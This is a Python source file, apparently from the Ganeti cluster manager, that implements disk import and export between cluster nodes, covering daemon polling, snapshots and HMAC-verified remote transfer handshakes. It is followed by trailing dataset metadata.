self.success = None self.final_message = None # Daemon status self._daemon_name = None self._daemon = None @property def recent_output(self): """Returns the most recent output from the daemon. """ if self._daemon: return "\n".join(self._daemon.recent_output) return None @property def progress(self): """Returns transfer progress information. 
""" if not self._daemon: return None return (self._daemon.progress_mbytes, self._daemon.progress_throughput, self._daemon.progress_percent, self._daemon.progress_eta) @property def magic(self): """Returns the magic value for this import/export. """ return self._opts.magic @property def active(self): """Determines whether this transport is still active. """ return self.success is None @property def loop(self): """Returns parent loop. @rtype: L{ImportExportLoop} """ return self._loop def SetLoop(self, loop): """Sets the parent loop. @type loop: L{ImportExportLoop} """ if self._loop: raise errors.ProgrammerError("Loop can only be set once") self._loop = loop def _StartDaemon(self): """Starts the import/export daemon. """ raise NotImplementedError() def CheckDaemon(self): """Checks whether daemon has been started and if not, starts it. @rtype: string @return: Daemon name """ assert self._ts_cleanup is None if self._daemon_name is None: assert self._ts_begin is None result = self._StartDaemon() if result.fail_msg: raise _ImportExportError("Failed to start %s on %s: %s" % (self.MODE_TEXT, self.node_name, result.fail_msg)) daemon_name = result.payload logging.info("Started %s '%s' on %s", self.MODE_TEXT, daemon_name, self.node_name) self._ts_begin = time.time() self._daemon_name = daemon_name return self._daemon_name def GetDaemonName(self): """Returns the daemon name. """ assert self._daemon_name, "Daemon has not been started" assert self._ts_cleanup is None return self._daemon_name def Abort(self): """Sends SIGTERM to import/export daemon (if still active). 
""" if self._daemon_name: self._lu.LogWarning("Aborting %s '%s' on %s", self.MODE_TEXT, self._daemon_name, self.node_uuid) result = self._lu.rpc.call_impexp_abort(self.node_uuid, self._daemon_name) if result.fail_msg: self._lu.LogWarning("Failed to abort %s '%s' on %s: %s", self.MODE_TEXT, self._daemon_name, self.node_uuid, result.fail_msg) return False return True def _SetDaemonData(self, data): """Internal function for updating status daemon data. @type data: L{objects.ImportExportStatus} @param data: Daemon status data """ assert self._ts_begin is not None if not data: if utils.TimeoutExpired(self._ts_begin, self._timeouts.ready): raise _ImportExportError("Didn't become ready after %s seconds" % self._timeouts.ready) return False self._daemon = data return True def SetDaemonData(self, success, data): """Updates daemon status data. @type success: bool @param success: Whether fetching data was successful or not @type data: L{objects.ImportExportStatus} @param data: Daemon status data """ if not success: if self._ts_last_error is None: self._ts_last_error = time.time() elif utils.TimeoutExpired(self._ts_last_error, self._timeouts.error): raise _ImportExportError("Too many errors while updating data") return False self._ts_last_error = None return self._SetDaemonData(data) def CheckListening(self): """Checks whether the daemon is listening. """ raise NotImplementedError() def _GetConnectedCheckEpoch(self): """Returns timeout to calculate connect timeout. """ raise NotImplementedError() def CheckConnected(self): """Checks whether the daemon is connected. 
@rtype: bool @return: Whether the daemon is connected """ assert self._daemon, "Daemon status missing" if self._ts_connected is not None: return True if self._daemon.connected: self._ts_connected = time.time() # TODO: Log remote peer logging.debug("%s '%s' on %s is now connected", self.MODE_TEXT, self._daemon_name, self.node_uuid) self._cbs.ReportConnected(self, self._private) return True if utils.TimeoutExpired(self._GetConnectedCheckEpoch(), self._timeouts.connect): raise _ImportExportError("Not connected after %s seconds" % self._timeouts.connect) return False def _CheckProgress(self): """Checks whether a progress update should be reported. """ if ((self._ts_last_progress is None or utils.TimeoutExpired(self._ts_last_progress, self._timeouts.progress)) and self._daemon and self._daemon.progress_mbytes is not None and self._daemon.progress_throughput is not None): self._cbs.ReportProgress(self, self._private) self._ts_last_progress = time.time() def CheckFinished(self): """Checks whether the daemon exited. @rtype: bool @return: Whether the transfer is finished """ assert self._daemon, "Daemon status missing" if self._ts_finished: return True if self._daemon.exit_status is None: # TODO: Adjust delay for ETA expiring soon self._CheckProgress() return False self._ts_finished = time.time() self._ReportFinished(self._daemon.exit_status == 0, self._daemon.error_message) return True def _ReportFinished(self, success, message): """Transfer is finished or daemon exited. 
@type success: bool @param success: Whether the transfer was successful @type message: string @param message: Error message """ assert self.success is None self.success = success self.final_message = message if success: logging.info("%s '%s' on %s succeeded", self.MODE_TEXT, self._daemon_name, self.node_uuid) elif self._daemon_name: self._lu.LogWarning("%s '%s' on %s failed: %s", self.MODE_TEXT, self._daemon_name, self._lu.cfg.GetNodeName(self.node_uuid), message) else: self._lu.LogWarning("%s on %s failed: %s", self.MODE_TEXT, self._lu.cfg.GetNodeName(self.node_uuid), message) self._cbs.ReportFinished(self, self._private) def _Finalize(self): """Makes the RPC call to finalize this import/export. """ return self._lu.rpc.call_impexp_cleanup(self.node_uuid, self._daemon_name) def Finalize(self, error=None): """Finalizes this import/export. """ if self._daemon_name: logging.info("Finalizing %s '%s' on %s", self.MODE_TEXT, self._daemon_name, self.node_uuid) result = self._Finalize() if result.fail_msg: self._lu.LogWarning("Failed to finalize %s '%s' on %s: %s", self.MODE_TEXT, self._daemon_name, self.node_uuid, result.fail_msg) return False # Daemon is no longer running self._daemon_name = None self._ts_cleanup = time.time() if error: self._ReportFinished(False, error) return True class DiskImport(_DiskImportExportBase): MODE_TEXT = "import" def __init__(self, lu, node_uuid, opts, instance, component, dest, dest_args, timeouts, cbs, private=None): """Initializes this class. 
@param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node name for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @param dest: I/O destination @param dest_args: I/O arguments @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ _DiskImportExportBase.__init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private) self._dest = dest self._dest_args = dest_args # Timestamps self._ts_listening = None @property def listen_port(self): """Returns the port the daemon is listening on. """ if self._daemon: return self._daemon.listen_port return None def _StartDaemon(self): """Starts the import daemon. """ return self._lu.rpc.call_import_start(self.node_uuid, self._opts, self._instance, self._component, (self._dest, self._dest_args)) def CheckListening(self): """Checks whether the daemon is listening. @rtype: bool @return: Whether the daemon is listening """ assert self._daemon, "Daemon status missing" if self._ts_listening is not None: return True port = self._daemon.listen_port if port is not None: self._ts_listening = time.time() logging.debug("Import '%s' on %s is now listening on port %s", self._daemon_name, self.node_uuid, port) self._cbs.ReportListening(self, self._private, self._component) return True if utils.TimeoutExpired(self._ts_begin, self._timeouts.listen): raise _ImportExportError("Not listening after %s seconds" % self._timeouts.listen) return False def _GetConnectedCheckEpoch(self): """Returns the time since we started listening. 
""" assert self._ts_listening is not None, \ ("Checking whether an import is connected is only useful" " once it's been listening") return self._ts_listening class DiskExport(_DiskImportExportBase): MODE_TEXT = "export" def __init__(self, lu, node_uuid, opts, dest_host, dest_port, instance, component, source, source_args, timeouts, cbs, private=None): """Initializes this class. @param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node UUID for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type dest_host: string @param dest_host: Destination host name or IP address @type dest_port: number @param dest_port: Destination port number @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @param source: I/O source @param source_args: I/O source @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ _DiskImportExportBase.__init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private) self._dest_host = dest_host self._dest_port = dest_port self._source = source self._source_args = source_args def _StartDaemon(self): """Starts the export daemon. """ return self._lu.rpc.call_export_start(self.node_uuid, self._opts, self._dest_host, self._dest_port, self._instance, self._component, (self._source, self._source_args)) def CheckListening(self): """Checks whether the daemon is listening. """ # Only an import can be listening return True def _GetConnectedCheckEpoch(self): """Returns the time since the daemon started. 
""" assert self._ts_begin is not None return self._ts_begin def FormatProgress(progress): """Formats progress information for user consumption """ (mbytes, throughput, percent, eta) = progress parts = [ utils.FormatUnit(mbytes, "h"), # Not using FormatUnit as it doesn't support kilobytes "%0.1f MiB/s" % throughput, ] if percent is not None: parts.append("%d%%" % percent) if eta is not None: parts.append("ETA %s" % utils.FormatSeconds(eta)) return utils.CommaJoin(parts) class ImportExportLoop(object): MIN_DELAY = 1.0 MAX_DELAY = 20.0 def __init__(self, lu): """Initializes this class. """ self._lu = lu self._queue = [] self._pending_add = [] def Add(self, diskie): """Adds an import/export object to the loop. @type diskie: Subclass of L{_DiskImportExportBase} @param diskie: Import/export object """ assert diskie not in self._pending_add assert diskie.loop is None diskie.SetLoop(self) # Adding new objects to a staging list is necessary, otherwise the main # loop gets confused if callbacks modify the queue while the main loop is # iterating over it. self._pending_add.append(diskie) @staticmethod def _CollectDaemonStatus(lu, daemons): """Collects the status for all import/export daemons. """ daemon_status = {} for node_name, names in daemons.iteritems(): result = lu.rpc.call_impexp_status(node_name, names) if result.fail_msg: lu.LogWarning("Failed to get daemon status on %s: %s", node_name, result.fail_msg) continue assert len(names) == len(result.payload) daemon_status[node_name] = dict(zip(names, result.payload)) return daemon_status @staticmethod def _GetActiveDaemonNames(queue): """Gets the names of all active daemons. 
""" result = {} for diskie in queue: if not diskie.active: continue try: # Start daemon if necessary daemon_name = diskie.CheckDaemon() except _ImportExportError, err: logging.exception("%s failed", diskie.MODE_TEXT) diskie.Finalize(error=str(err)) continue result.setdefault(diskie.node_name, []).append(daemon_name) assert len(queue) >= len(result) assert len(queue) >= sum([len(names) for names in result.itervalues()]) logging.debug("daemons=%r", result) return result def _AddPendingToQueue(self): """Adds all pending import/export objects to the internal queue. """ assert compat.all(diskie not in self._queue and diskie.loop == self for diskie in self._pending_add) self._queue.extend(self._pending_add) del self._pending_add[:] def Run(self): """Utility main loop. """ while True: self._AddPendingToQueue() # Collect all active daemon names daemons = self._GetActiveDaemonNames(self._queue) if not daemons: break # Collection daemon status data data = self._CollectDaemonStatus(self._lu, daemons) # Use data delay = self.MAX_DELAY for diskie in self._queue: if not diskie.active: continue try: try: all_daemon_data = data[diskie.node_name] except KeyError: result = diskie.SetDaemonData(False, None) else: result = \ diskie.SetDaemonData(True, all_daemon_data[diskie.GetDaemonName()]) if not result: # Daemon not yet ready, retry soon delay = min(3.0, delay) continue if diskie.CheckFinished(): # Transfer finished diskie.Finalize() continue # Normal case: check again in 5 seconds delay = min(5.0, delay) if not diskie.CheckListening(): # Not yet listening, retry soon delay = min(1.0, delay) continue if not diskie.CheckConnected(): # Not yet connected, retry soon delay = min(1.0, delay) continue except _ImportExportError, err: logging.exception("%s failed", diskie.MODE_TEXT) diskie.Finalize(error=str(err)) if not compat.any(diskie.active for diskie in self._queue): break # Wait a bit delay = min(self.MAX_DELAY, max(self.MIN_DELAY, delay)) logging.debug("Waiting for %ss", delay) 
time.sleep(delay) def FinalizeAll(self): """Finalizes all pending transfers. """ success = True for diskie in self._queue: success = diskie.Finalize() and success return success class _TransferInstCbBase(ImportExportCbBase): def __init__(self, lu, feedback_fn, instance, timeouts, src_node_uuid, src_cbs, dest_node_uuid, dest_ip): """Initializes this class. """ ImportExportCbBase.__init__(self) self.lu = lu self.feedback_fn = feedback_fn self.instance = instance self.timeouts = timeouts self.src_node_uuid = src_node_uuid self.src_cbs = src_cbs self.dest_node_uuid = dest_node_uuid self.dest_ip = dest_ip class _TransferInstSourceCb(_TransferInstCbBase): def ReportConnected(self, ie, dtp): """Called when a connection has been established. """ assert self.src_cbs is None assert dtp.src_export == ie assert dtp.dest_import self.feedback_fn("%s is sending data on %s" % (dtp.data.name, ie.node_name)) def ReportProgress(self, ie, dtp): """Called when new progress information should be reported. """ progress = ie.progress if not progress: return self.feedback_fn("%s sent %s" % (dtp.data.name, FormatProgress(progress))) def ReportFinished(self, ie, dtp): """Called when a transfer has finished. """ assert self.src_cbs is None assert dtp.src_export == ie assert dtp.dest_import if ie.success: self.feedback_fn("%s finished sending data" % dtp.data.name) else: self.feedback_fn("%s failed to send data: %s (recent output: %s)" % (dtp.data.name, ie.final_message, ie.recent_output)) dtp.RecordResult(ie.success) cb = dtp.data.finished_fn if cb: cb() # TODO: Check whether sending SIGTERM right away is okay, maybe we should # give the daemon a moment to sort things out if dtp.dest_import and not ie.success: dtp.dest_import.Abort() class _TransferInstDestCb(_TransferInstCbBase): def ReportListening(self, ie, dtp, component): """Called when daemon started listening. 
""" assert self.src_cbs assert dtp.src_export is None assert dtp.dest_import assert dtp.export_opts self.feedback_fn("%s is now listening, starting export" % dtp.data.name) # Start export on source node de = DiskExport(self.lu, self.src_node_uuid, dtp.export_opts, self.dest_ip, ie.listen_port, self.instance, component, dtp.data.src_io, dtp.data.src_ioargs, self.timeouts, self.src_cbs, private=dtp) ie.loop.Add(de) dtp.src_export = de def ReportConnected(self, ie, dtp): """Called when a connection has been established. """ self.feedback_fn("%s is receiving data on %s" % (dtp.data.name, self.lu.cfg.GetNodeName(self.dest_node_uuid))) def ReportFinished(self, ie, dtp): """Called when a transfer has finished. """ if ie.success: self.feedback_fn("%s finished receiving data" % dtp.data.name) else: self.feedback_fn("%s failed to receive data: %s (recent output: %s)" % (dtp.data.name, ie.final_message, ie.recent_output)) dtp.RecordResult(ie.success) # TODO: Check whether sending SIGTERM right away is okay, maybe we should # give the daemon a moment to sort things out if dtp.src_export and not ie.success: dtp.src_export.Abort() class DiskTransfer(object): def __init__(self, name, src_io, src_ioargs, dest_io, dest_ioargs, finished_fn): """Initializes this class. @type name: string @param name: User-visible name for this transfer (e.g. "disk/0") @param src_io: Source I/O type @param src_ioargs: Source I/O arguments @param dest_io: Destination I/O type @param dest_ioargs: Destination I/O arguments @type finished_fn: callable @param finished_fn: Function called once transfer has finished """ self.name = name self.src_io = src_io self.src_ioargs = src_ioargs self.dest_io = dest_io self.dest_ioargs = dest_ioargs self.finished_fn = finished_fn class _DiskTransferPrivate(object): def __init__(self, data, success, export_opts): """Initializes this class. 
@type data: L{DiskTransfer} @type success: bool """ self.data = data self.success = success self.export_opts = export_opts self.src_export = None self.dest_import = None def RecordResult(self, success): """Updates the status. One failed part will cause the whole transfer to fail. """ self.success = self.success and success def _GetInstDiskMagic(base, instance_name, index): """Computes the magic value for a disk export or import. @type base: string @param base: Random seed value (can be the same for all disks of a transfer) @type instance_name: string @param instance_name: Name of instance @type index: number @param index: Disk index """ h = compat.sha1_hash() h.update(str(constants.RIE_VERSION)) h.update(base) h.update(instance_name) h.update(str(index)) return h.hexdigest() def TransferInstanceData(lu, feedback_fn, src_node_uuid, dest_node_uuid, dest_ip, instance, all_transfers): """Transfers an instance's data from one node to another. @param lu: Logical unit instance @param feedback_fn: Feedback function @type src_node_uuid: string @param src_node_uuid: Source node UUID @type dest_node_uuid: string @param dest_node_uuid: Destination node UUID @type dest_ip: string @param dest_ip: IP address of destination node @type instance: L{objects.Instance} @param instance: Instance object @type all_transfers: list of L{DiskTransfer} instances @param all_transfers: List of all disk transfers to be made @rtype: list @return: List with a boolean (True=successful, False=failed) for success for each transfer """ # Disable compression for all moves as these are all within the same cluster compress = constants.IEC_NONE src_node_name = lu.cfg.GetNodeName(src_node_uuid) dest_node_name = lu.cfg.GetNodeName(dest_node_uuid) logging.debug("Source node %s, destination node %s, compression '%s'", src_node_name, dest_node_name, compress) timeouts = ImportExportTimeouts(constants.DISK_TRANSFER_CONNECT_TIMEOUT) src_cbs = _TransferInstSourceCb(lu, feedback_fn, instance, timeouts, 
src_node_uuid, None, dest_node_uuid, dest_ip) dest_cbs = _TransferInstDestCb(lu, feedback_fn, instance, timeouts, src_node_uuid, src_cbs, dest_node_uuid, dest_ip) all_dtp = [] base_magic = utils.GenerateSecret(6) ieloop = ImportExportLoop(lu) try: for idx, transfer in enumerate(all_transfers): if transfer: feedback_fn("Exporting %s from %s to %s" % (transfer.name, src_node_name, dest_node_name)) magic = _GetInstDiskMagic(base_magic, instance.name, idx) opts = objects.ImportExportOptions(key_name=None, ca_pem=None, compress=compress, magic=magic) dtp = _DiskTransferPrivate(transfer, True, opts) di = DiskImport(lu, dest_node_uuid, opts, instance, "disk%d" % idx, transfer.dest_io, transfer.dest_ioargs, timeouts, dest_cbs, private=dtp) ieloop.Add(di) dtp.dest_import = di else: dtp = _DiskTransferPrivate(None, False, None) all_dtp.append(dtp) ieloop.Run() finally: ieloop.FinalizeAll() assert len(all_dtp) == len(all_transfers) assert compat.all((dtp.src_export is None or dtp.src_export.success is not None) and (dtp.dest_import is None or dtp.dest_import.success is not None) for dtp in all_dtp), \ "Not all imports/exports are finalized" return [bool(dtp.success) for dtp in all_dtp] class _RemoteExportCb(ImportExportCbBase): def __init__(self, feedback_fn, disk_count): """Initializes this class. """ ImportExportCbBase.__init__(self) self._feedback_fn = feedback_fn self._dresults = [None] * disk_count @property def disk_results(self): """Returns per-disk results. """ return self._dresults def ReportConnected(self, ie, private): """Called when a connection has been established. """ (idx, _) = private self._feedback_fn("Disk %s is now sending data" % idx) def ReportProgress(self, ie, private): """Called when new progress information should be reported. """ (idx, _) = private progress = ie.progress if not progress: return self._feedback_fn("Disk %s sent %s" % (idx, FormatProgress(progress))) def ReportFinished(self, ie, private): """Called when a transfer has finished. 
""" (idx, finished_fn) = private if ie.success: self._feedback_fn("Disk %s finished sending data" % idx) else: self._feedback_fn("Disk %s failed to send data: %s (recent output: %s)" % (idx, ie.final_message, ie.recent_output)) self._dresults[idx] = bool(ie.success) if finished_fn: finished_fn() class ExportInstanceHelper(object): def __init__(self, lu, feedback_fn, instance): """Initializes this class. @param lu: Logical unit instance @param feedback_fn: Feedback function @type instance: L{objects.Instance} @param instance: Instance object """ self._lu = lu self._feedback_fn = feedback_fn self._instance = instance self._snap_disks = [] self._removed_snaps = [False] * len(instance.disks) def CreateSnapshots(self): """Creates a snapshot for every disk of the instance. Currently support drbd, plain and ext disk templates. """ assert not self._snap_disks instance = self._instance src_node = instance.primary_node src_node_name = self._lu.cfg.GetNodeName(src_node) for idx, disk in enumerate(instance.disks): self._feedback_fn("Creating a snapshot of disk/%s on node %s" % (idx, src_node_name)) # result.payload will be a snapshot of an lvm leaf of the one we # passed result = self._lu.rpc.call_blockdev_snapshot(src_node, (disk, instance), None, None) new_dev = False msg = result.fail_msg if msg: self._lu.LogWarning("Could not snapshot disk/%s on node %s: %s", idx, src_node_name, msg) elif (not isinstance(result.payload, (tuple, list)) or len(result.payload) != 2): self._lu.LogWarning("Could not snapshot disk/%s on node %s: invalid" " result '%s'", idx, src_node_name, result.payload) else: disk_id = tuple(result.payload) # Snapshot is currently supported for ExtStorage and LogicalVolume. # In case disk is of type drbd the snapshot will be of type plain. 
if disk.dev_type == constants.DT_EXT: dev_type = constants.DT_EXT else: dev_type = constants.DT_PLAIN disk_params = constants.DISK_LD_DEFAULTS[dev_type].copy() new_dev = objects.Disk(dev_type=dev_type, size=disk.size, logical_id=disk_id, iv_name=disk.iv_name, params=disk_params) self._snap_disks.append(new_dev) assert len(self._snap_disks) == len(instance.disks) assert len(self._removed_snaps) == len(instance.disks) def _RemoveSnapshot(self, disk_index): """Removes an LVM snapshot. @type disk_index: number @param disk_index: Index of the snapshot to be removed """ disk = self._snap_disks[disk_index] if disk and not self._removed_snaps[disk_index]: src_node = self._instance.primary_node src_node_name = self._lu.cfg.GetNodeName(src_node) self._feedback_fn("Removing snapshot of disk/%s on node %s" % (disk_index, src_node_name)) result = self._lu.rpc.call_blockdev_remove(src_node, (disk, self._instance)) if result.fail_msg: self._lu.LogWarning("Could not remove snapshot for disk/%d from node" " %s: %s", disk_index, src_node_name, result.fail_msg) else: self._removed_snaps[disk_index] = True def LocalExport(self, dest_node): """Intra-cluster instance export. 
@type dest_node: L{objects.Node} @param dest_node: Destination node """ instance = self._instance src_node_uuid = instance.primary_node assert len(self._snap_disks) == len(instance.disks) transfers = [] for idx, dev in enumerate(self._snap_disks): if not dev: transfers.append(None) continue path = utils.PathJoin(pathutils.EXPORT_DIR, "%s.new" % instance.name, dev.logical_id[1]) finished_fn = compat.partial(self._TransferFinished, idx) # FIXME: pass debug option from opcode to backend dt = DiskTransfer("snapshot/%s" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), constants.IEIO_FILE, (path, ), finished_fn) transfers.append(dt) # Actually export data dresults = TransferInstanceData(self._lu, self._feedback_fn, src_node_uuid, dest_node.uuid, dest_node.secondary_ip, instance, transfers) assert len(dresults) == len(instance.disks) self._feedback_fn("Finalizing export on %s" % dest_node.name) result = self._lu.rpc.call_finalize_export(dest_node.uuid, instance, self._snap_disks) msg = result.fail_msg fin_resu = not msg if msg: self._lu.LogWarning("Could not finalize export for instance %s" " on node %s: %s", instance.name, dest_node.name, msg) return (fin_resu, dresults) def RemoteExport(self, disk_info, key_name, dest_ca_pem, timeouts): """Inter-cluster instance export. 
@type disk_info: list @param disk_info: Per-disk destination information @type key_name: string @param key_name: Name of X509 key to use @type dest_ca_pem: string @param dest_ca_pem: Destination X509 CA in PEM format @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import """ instance = self._instance assert len(disk_info) == len(instance.disks) cbs = _RemoteExportCb(self._feedback_fn, len(instance.disks)) ieloop = ImportExportLoop(self._lu) try: for idx, (dev, (host, port, magic)) in enumerate(zip(instance.disks, disk_info)): # Decide whether to use IPv6 ipv6 = netutils.IP6Address.IsValid(host) opts = objects.ImportExportOptions(key_name=key_name, ca_pem=dest_ca_pem, magic=magic, ipv6=ipv6) self._feedback_fn("Sending disk %s to %s:%s" % (idx, host, port)) finished_fn = compat.partial(self._TransferFinished, idx) ieloop.Add(DiskExport(self._lu, instance.primary_node, opts, host, port, instance, "disk%d" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), timeouts, cbs, private=(idx, finished_fn))) ieloop.Run() finally: ieloop.FinalizeAll() return (True, cbs.disk_results) def _TransferFinished(self, idx): """Called once a transfer has finished. @type idx: number @param idx: Disk index """ logging.debug("Transfer %s finished", idx) self._RemoveSnapshot(idx) def Cleanup(self): """Remove all snapshots. """ assert len(self._removed_snaps) == len(self._instance.disks) for idx in range(len(self._instance.disks)): self._RemoveSnapshot(idx) class _RemoteImportCb(ImportExportCbBase): def __init__(self, feedback_fn, cds, x509_cert_pem, disk_count, external_address): """Initializes this class. 
@type cds: string @param cds: Cluster domain secret @type x509_cert_pem: string @param x509_cert_pem: CA used for signing import key @type disk_count: number @param disk_count: Number of disks @type external_address: string @param external_address: External address of destination node """ ImportExportCbBase.__init__(self) self._feedback_fn = feedback_fn self._cds = cds self._x509_cert_pem = x509_cert_pem self._disk_count = disk_count self._external_address = external_address self._dresults = [None] * disk_count self._daemon_port = [None] * disk_count self._salt = utils.GenerateSecret(8) @property def disk_results(self): """Returns per-disk results. """ return self._dresults def _CheckAllListening(self): """Checks whether all daemons are listening. If all daemons are listening, the information is sent to the client. """ if not compat.all(dp is not None for dp in self._daemon_port): return host = self._external_address disks = [] for idx, (port, magic) in enumerate(self._daemon_port): disks.append(ComputeRemoteImportDiskInfo(self._cds, self._salt, idx, host, port, magic)) assert len(disks) == self._disk_count self._feedback_fn(constants.ELOG_REMOTE_IMPORT, { "disks": disks, "x509_ca": self._x509_cert_pem, }) def ReportListening(self, ie, private, _): """Called when daemon started listening. """ (idx, ) = private self._feedback_fn("Disk %s is now listening" % idx) assert self._daemon_port[idx] is None self._daemon_port[idx] = (ie.listen_port, ie.magic) self._CheckAllListening() def ReportConnected(self, ie, private): """Called when a connection has been established. """ (idx, ) = private self._feedback_fn("Disk %s is now receiving data" % idx) def ReportFinished(self, ie, private): """Called when a transfer has finished. 
""" (idx, ) = private # Daemon is certainly no longer listening self._daemon_port[idx] = None if ie.success: self._feedback_fn("Disk %s finished receiving data" % idx) else: self._feedback_fn(("Disk %s failed to receive data: %s" " (recent output: %s)") % (idx, ie.final_message, ie.recent_output)) self._dresults[idx] = bool(ie.success) def RemoteImport(lu, feedback_fn, instance, pnode, source_x509_ca, cds, timeouts): """Imports an instance from another cluster. @param lu: Logical unit instance @param feedback_fn: Feedback function @type instance: L{objects.Instance} @param instance: Instance object @type pnode: L{objects.Node} @param pnode: Primary node of instance as an object @type source_x509_ca: OpenSSL.crypto.X509 @param source_x509_ca: Import source's X509 CA @type cds: string @param cds: Cluster domain secret @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import """ source_ca_pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, source_x509_ca) magic_base = utils.GenerateSecret(6) # Decide whether to use IPv6 ipv6 = netutils.IP6Address.IsValid(pnode.primary_ip) # Create crypto key result = lu.rpc.call_x509_cert_create(instance.primary_node, constants.RIE_CERT_VALIDITY) result.Raise("Can't create X509 key and certificate on %s" % result.node) (x509_key_name, x509_cert_pem) = result.payload try: # Load certificate x509_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, x509_cert_pem) # Sign certificate signed_x509_cert_pem = \ utils.SignX509Certificate(x509_cert, cds, utils.GenerateSecret(8)) cbs = _RemoteImportCb(feedback_fn, cds, signed_x509_cert_pem, len(instance.disks), pnode.primary_ip) ieloop = ImportExportLoop(lu) try: for idx, dev in enumerate(instance.disks): magic = _GetInstDiskMagic(magic_base, instance.name, idx) # Import daemon options opts = objects.ImportExportOptions(key_name=x509_key_name, ca_pem=source_ca_pem, magic=magic, ipv6=ipv6) ieloop.Add(DiskImport(lu, instance.primary_node, 
opts, instance, "disk%d" % idx, constants.IEIO_SCRIPT, ((dev, instance), idx), timeouts, cbs, private=(idx, ))) ieloop.Run() finally: ieloop.FinalizeAll() finally: # Remove crypto key and certificate result = lu.rpc.call_x509_cert_remove(instance.primary_node, x509_key_name) result.Raise("Can't remove X509 key and certificate on %s" % result.node) return cbs.disk_results def _GetImportExportHandshakeMessage(version): """Returns the handshake message for a RIE protocol version. @type version: number """ return "%s:%s" % (version, constants.RIE_HANDSHAKE) def ComputeRemoteExportHandshake(cds): """Computes the remote import/export handshake. @type cds: string @param cds: Cluster domain secret """ salt = utils.GenerateSecret(8) msg = _GetImportExportHandshakeMessage(constants.RIE_VERSION) return (constants.RIE_VERSION, utils.Sha1Hmac(cds, msg, salt=salt), salt) def CheckRemoteExportHandshake(cds, handshake): """Checks the handshake of a remote import/export. @type cds: string @param cds: Cluster domain secret @type handshake: sequence @param handshake: Handshake sent by remote peer """ try: (version, hmac_digest, hmac_salt) = handshake except (TypeError, ValueError), err: return "Invalid data: %s" % err if not utils.VerifySha1Hmac(cds, _GetImportExportHandshakeMessage(version), hmac_digest, salt=hmac_salt): return "Hash didn't match, clusters don't share the same domain secret" if version != constants.RIE_VERSION: return ("Clusters don't have the same remote import/export protocol" " (local=%s, remote=%s)" % (constants.RIE_VERSION, version)) return None def _GetRieDiskInfoMessage(disk_index, host, port, magic): """Returns the hashed text for import/export disk information. 
@type disk_index: number @param disk_index: Index of disk (included in hash) @type host: string @param host: Hostname @type port: number @param port: Daemon port @type magic: string @param magic: Magic value """ return "%s:%s:%s:%s" % (disk_index, host, port, magic) def CheckRemoteExportDiskInfo(cds, disk_index, disk_info): """Verifies received disk information for an export. @type cds: string @param cds: Cluster domain secret @type disk_index: number @param disk_index: Index of disk (included in hash) @type disk_info: sequence @param disk_info: Disk information sent by remote peer """ try: (host, port, magic, hmac_digest, hmac_salt) = disk_info except (TypeError, ValueError), err: raise errors.GenericError("Invalid data: %s" % err) if not (host and port and magic): raise errors.GenericError("Missing destination host, port or magic") msg = _GetRieDiskInfoMessage(disk_index, host, port, magic) if not utils.VerifySha1Hmac(cds, msg, hmac_digest, salt=hmac_salt): raise errors.GenericError("HMAC is wrong") if netutils.IP6Address.IsValid(host) or netutils.IP4Address.IsValid(host): destination = host else: destination = netutils.Hostname.GetNormalizedName(host) return (destination, utils.ValidateServiceName(port), magic) def ComputeRemoteImportDiskInfo(cds, salt, disk_index, host, port, magic): """Computes the signed disk information for a remote import. @type cds: string @param cds: Cluster domain secret @type salt: string @param salt: HMAC salt @type disk_index: number @param disk_index: Index of disk (included in hash) @type host: string @param host: Hostname @type port: number @param port: Daemon port @type magic: string @param magic: Magic value """ msg = _GetRieDiskInfoMessage(disk_index, host, port, magic) hmac_digest = utils.Sha1Hmac(cds, msg, salt=salt) return (host, port, magic, hmac_digest, salt) def CalculateGroupIPolicy(cluster, group): """Calculate instance policy for group. 
""" return cluster.SimpleFillIPolicy(group.ipolicy) def ComputeDiskSize(disk_template, disks): """Compute disk size requirements according to disk template """ # Required free disk space as a function of disk and swap space req_size_dict = { constants.DT_DISKLESS: 0, constants.DT_PLAIN: sum(d[constants.IDISK_SIZE] for d in disks), # 128 MB are added for drbd metadata for each disk constants.DT_DRBD8: sum(d[constants.IDISK_SIZE] + constants.DRBD_META_SIZE for d in disks), constants.DT_FILE: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_SHARED_FILE: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_BLOCK: 0, constants.DT_RBD: sum(d[constants.IDISK_SIZE] for d in disks), constants.DT_EXT: sum(d[constants.IDISK_SIZE] for d in disks), } if disk_template not in req_size_dict: raise errors.ProgrammerError("Disk template '%s' size requirement" " is unknown" % disk_template) return req_size_dict[disk_template]
29.205389
80
0.65157
795a85f01b375b0661c66c85963ba903125b88ce
362
py
Python
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
1
2022-02-25T19:53:26.000Z
2022-02-25T19:53:26.000Z
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
null
null
null
gcs_s3_transfer_service/schemas/load.py
ENCODE-DCC/gcs-s3-transfer-service
b402da5f202f5be17439213ddce4b98a0c7884cb
[ "MIT" ]
null
null
null
